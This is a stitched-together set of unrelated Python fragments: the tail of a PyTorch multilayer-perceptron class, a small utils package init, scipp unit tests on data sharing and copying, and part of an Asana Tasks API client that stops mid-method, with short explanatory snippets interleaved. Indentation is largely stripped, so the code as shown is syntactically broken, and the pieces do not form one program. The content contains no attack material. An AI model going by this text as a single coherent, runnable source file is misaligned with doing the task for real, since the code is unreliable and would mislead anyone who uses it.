self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input):
# Assumes input is Batch_Size x Input_Size.
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
# Compute preprobability with output layer.
preprobability_outputs = self.output_layer(h4)
# Compute probabilities and logprobabilities.
log_probabilities = self.batch_logsoftmax_layer(preprobability_outputs)
probabilities = self.batch_softmax_layer(preprobability_outputs)
return log_probabilities, probabilities
def get_probabilities(self, input):
        return self.forward(input)
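The softmax / log-softmax pair that `DiscreteMLP.forward` returns obeys `log_softmax(x) = x - logsumexp(x)`; a minimal numeric sketch (logits arbitrary):

```python
import math

# Computing log-probabilities via logsumexp and recovering probabilities by
# exponentiation, mirroring the Softmax / LogSoftmax pair returned above.
logits = [2.0, 1.0, 0.1]
lse = math.log(sum(math.exp(v) for v in logits))
log_probs = [v - lse for v in logits]
probs = [math.exp(lp) for lp in log_probs]

assert abs(sum(probs) - 1.0) < 1e-12   # a valid probability distribution
assert probs[0] == max(probs)          # the largest logit has the largest probability
```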
from .utils import mask_nii_2_hdf5, \
roi_data_from_hdf, \
convert_mapper_data_to_session, \
natural_sort
__all__ = [ 'mask_nii_2_hdf5',
'roi_data_from_hdf',
'convert_mapper_data_to_session',
'natural_sort'
]
# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author Jan-Lukas Wynen
from copy import copy, deepcopy
import pytest
import scipp as sc
def make_data_array():
v = sc.array(dims=['x'], values=[10, 20], unit='m')
c = sc.array(dims=['x'], values=[1, 2], unit='s')
a = sc.array(dims=['x'], values=[100, 200])
m = sc.array(dims=['x'], values=[True, False])
da = sc.DataArray(v, coords={'x': c}, attrs={'a': a}, masks={'m': m})
return da, v, c, a, m
def test_own_darr_set():
# Data and metadata are shared
da, v, c, a, m = make_data_array()
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
# Assignments overwrite data but not metadata.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
da.masks['m'] = sc.array(dims=['x'], values=[True, True])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])},
masks={'m': sc.array(dims=['x'], values=[True, True])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
def test_own_darr_get():
# Data and metadata are shared.
da = make_data_array()[0]
v = da.data
c = da.coords['x']
a = da.attrs['a']
m = da.masks['m']
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
# Assignments overwrite data but not coords.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
da.masks['m'] = sc.array(dims=['x'], values=[True, True])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])},
masks={'m': sc.array(dims=['x'], values=[True, True])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
assert sc.identical(m, sc.array(dims=['x'], values=[False, True]))
def test_own_darr_get_meta():
# Data and metadata are shared.
da = make_data_array()[0]
del da.masks['m'] # not accessible through .meta and tested elsewhere
v = da.data
c = da.meta['x']
a = da.meta['a']
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
c['x', 1] = -2
a['x', 1] = -200
da.unit = 'kg'
da.coords['x'].unit = 'J'
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])}))
assert sc.identical(v, sc.array(dims=['x'], values=[-10, -20], unit='kg'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
# Assignments overwrite data but not coords.
da.data = sc.array(dims=['x'], values=[11, 22], unit='m')
da.coords['x'] = sc.array(dims=['x'], values=[3, 4], unit='s')
da.attrs['a'] = sc.array(dims=['x'], values=[300, 400])
assert sc.identical(
da,
sc.DataArray(sc.array(dims=['x'], values=[11, 22], unit='m'),
coords={'x': sc.array(dims=['x'], values=[3, 4], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[300, 400])}))
# Assignment replaces data
assert not sc.identical(v, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(da.data, sc.array(dims=['x'], values=[11, 22], unit='m'))
assert sc.identical(c, sc.array(dims=['x'], values=[-1, -2], unit='J'))
assert sc.identical(a, sc.array(dims=['x'], values=[-100, -200]))
def test_own_darr_copy():
# Depth of copy can be controlled.
da, _, c, a, m = make_data_array()
da_copy = copy(da)
da_deepcopy = deepcopy(da)
da_methcopy = da.copy(deep=False)
da_methdeepcopy = da.copy(deep=True)
da['x', 0] = -10
da.data['x', 1] = -20
da.coords['x']['x', 0] = -1
da.attrs['a']['x', 0] = -100
da.masks['m']['x', 0] = False
c['x', 1] = -2
a['x', 1] = -200
m['x', 1] = True
da.unit = 'kg'
da.coords['x'].unit = 'J'
modified = sc.DataArray(
sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[-1, -2], unit='J')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])})
assert sc.identical(da, modified)
assert sc.identical(da_copy, modified)
assert sc.identical(da_deepcopy, make_data_array()[0])
assert sc.identical(da_methcopy, modified)
assert sc.identical(da_methdeepcopy, make_data_array()[0])
def test_own_dset_set_access_through_dataarray():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['da1']['x', 0] = -10
dset['da1'].attrs['a']['x', 0] = -100
dset['da1'].masks['m']['x', 0] = False
da['x', 1] = -20
da.coords['x']['x', 1] = -2
da.attrs['a']['x', 1] = -200
da.masks['m']['x', 1] = True
dset['da1'].unit = 'kg'
expected = sc.DataArray(
sc.array(dims=['x'], values=[-10, -20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[1, -2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, -200])},
masks={'m': sc.array(dims=['x'], values=[False, True])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_scalar_slice():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', 0]['da1'].value = -10
dset['x', 0]['da1'].attrs['a'].value = -100
dset['x', 0]['da1'].masks['m'].value = False
with pytest.raises(sc.VariableError):
dset['x', 0]['da1'].attrs['x'].value = -1
with pytest.raises(sc.UnitError):
dset['x', 0]['da1'].unit = 's'
expected = sc.DataArray(sc.array(dims=['x'], values=[-10, 20], unit='m'),
coords={'x': sc.array(dims=['x'], values=[1, 2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, 200])},
masks={'m': sc.array(dims=['x'], values=[False, False])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_range_slice():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', :]['da1']['x', 0] = -10
dset['x', :]['da1'].attrs['a']['x', 0] = -100
    dset['x', :]['da1'].masks['m']['x', 0] = False
dset['x', :]['da1'].unit = 'kg'
expected = sc.DataArray(sc.array(dims=['x'], values=[-10, 20], unit='kg'),
coords={'x': sc.array(dims=['x'], values=[1, 2], unit='s')},
attrs={'a': sc.array(dims=['x'], values=[-100, 200])},
masks={'m': sc.array(dims=['x'], values=[False, False])})
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_coords():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset.coords['x']['x', 0] = -1
expected, *_ = make_data_array()
expected.coords['x']['x', 0] = -1
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
def test_own_dset_set_access_through_range_slice_coords():
# The DataArray is shared.
dset = sc.Dataset()
da, *_ = make_data_array()
dset['da1'] = da
dset['x', :]['da1']['x', 0] = -10
dset['x', :].coords['x']['x', 0] = -1
expected, *_ = make_data_array()
expected['x', 0] = -10
expected.coords['x']['x', 0] = -1
assert sc.identical(dset, sc.Dataset(data={'da1': expected}))
assert sc.identical(da, expected)
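`test_own_darr_copy` above distinguishes shallow from deep copies; plain Python containers exhibit the same sharing behavior, which the stdlib `copy` module makes easy to demonstrate:

```python
from copy import copy, deepcopy

# A shallow copy shares nested buffers with the original; a deep copy does not.
original = {'values': [10, 20]}
shallow = copy(original)
deep = deepcopy(original)

original['values'][0] = -10
assert shallow['values'] == [-10, 20]   # shared inner list
assert deep['values'] == [10, 20]       # independent copy
```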
# coding=utf-8
class _Tasks:
def __init__(self, client=None):
self.client = client
def add_dependencies_for_task(self, task_gid, params=None, **options):
"""Set dependencies for a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addDependencies".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_dependents_for_task(self, task_gid, params=None, **options):
"""Set dependents for a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addDependents".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_followers_for_task(self, task_gid, params=None, **options):
"""Add followers to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addFollowers".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_project_for_task(self, task_gid, params=None, **options):
"""Add a project to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addProject".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def add_tag_for_task(self, task_gid, params=None, **options):
"""Add a tag to a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/addTag".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
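# A minimal usage sketch for the add*/remove* helpers above (assumes an
# authenticated asana.Client; gids are hypothetical). Per the Asana API,
# the request body carries the tag's gid under the "tag" key:
#
#     client.tasks.add_tag_for_task("1201234567890", {"tag": "1209876543210"})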
def create_subtask_for_task(self, task_gid, params=None, **options):
"""Create a subtask
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/subtasks".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def create_task(self, params=None, **options):
"""Create a task
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks"
return self.client.post(path, params, **options)
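# Usage sketch (hypothetical gids): a new task must specify a workspace, or
# at least one project or parent from which the workspace can be inferred:
#
#     client.tasks.create_task({"name": "Draft report", "projects": ["1201111111111"]})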
def delete_task(self, task_gid, params=None, **options):
"""Delete a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.delete(path, params, **options)
def duplicate_task(self, task_gid, params=None, **options):
"""Duplicate a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/duplicate".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def get_dependencies_for_task(self, task_gid, params=None, **options):
"""Get dependencies from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/dependencies".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
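# Pagination sketch (hypothetical gid): get_collection typically returns an
# iterator that follows offset tokens for you, so the per-page size is the
# main knob worth setting explicitly:
#
#     for dep in client.tasks.get_dependencies_for_task("1201234567890", {}, limit=50):
#         print(dep["gid"])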
def get_dependents_for_task(self, task_gid, params=None, **options):
"""Get dependents from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/dependents".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
def get_subtasks_for_task(self, task_gid, params=None, **options):
"""Get subtasks from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/subtasks".replace("{task_gid}", task_gid)
return self.client.get_collection(path, params, **options)
def get_task(self, task_gid, params=None, **options):
"""Get a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.get(path, params, **options)
def get_tasks(self, params=None, **options):
"""Get multiple tasks
:param Object params: Parameters for the request
- assignee {str}: The assignee to filter tasks on. *Note: If you specify `assignee`, you must also specify the `workspace` to filter on.*
- project {str}: The project to filter tasks on.
- section {str}: The section to filter tasks on. *Note: Currently, this is only supported in board views.*
- workspace {str}: The workspace to filter tasks on. *Note: If you specify `workspace`, you must also specify the `assignee` to filter on.*
- completed_since {datetime}: Only return tasks that are either incomplete or that have been completed since this time.
- modified_since {datetime}: Only return tasks that have been modified since the given time. *Note: A task is considered “modified” if any of its properties change, or associations between it and other objects are modified (e.g. a task being added to a project). A task is not considered modified just because another object it is associated with (e.g. a subtask) is modified. Actions that count as modifying the task include assigning, renaming, completing, and adding stories.*
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks"
return self.client.get_collection(path, params, **options)
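# Filtering sketch (hypothetical workspace gid): per the note in the
# docstring above, assignee and workspace must be supplied together:
#
#     client.tasks.get_tasks({"assignee": "me", "workspace": "1200000000000"})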
def get_tasks_for_project(self, project_gid, params=None, **options):
"""Get tasks from a project
:param str project_gid: (required) Globally unique identifier for the project.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/projects/{project_gid}/tasks".replace("{project_gid}", project_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_section(self, section_gid, params=None, **options):
"""Get tasks from a section
:param str section_gid: (required) The globally unique identifier for the section.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/sections/{section_gid}/tasks".replace("{section_gid}", section_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_tag(self, tag_gid, params=None, **options):
"""Get tasks from a tag
:param str tag_gid: (required) Globally unique identifier for the tag.
:param Object params: Parameters for the request
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tags/{tag_gid}/tasks".replace("{tag_gid}", tag_gid)
return self.client.get_collection(path, params, **options)
def get_tasks_for_user_task_list(self, user_task_list_gid, params=None, **options):
"""Get tasks from a user task list
:param str user_task_list_gid: (required) Globally unique identifier for the user task list.
:param Object params: Parameters for the request
- completed_since {str}: Only return tasks that are either incomplete or that have been completed since this time. Accepts a date-time string or the keyword *now*.
:param **options
- offset {str}: Offset token. An offset to the next page returned by the API. A pagination request will return an offset token, which can be used as an input parameter to the next request. If an offset is not passed in, the API will return the first page of results. 'Note: You can only pass in an offset that was returned to you via a previously paginated request.'
- limit {int}: Results per page. The number of objects to return per page. The value must be between 1 and 100.
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
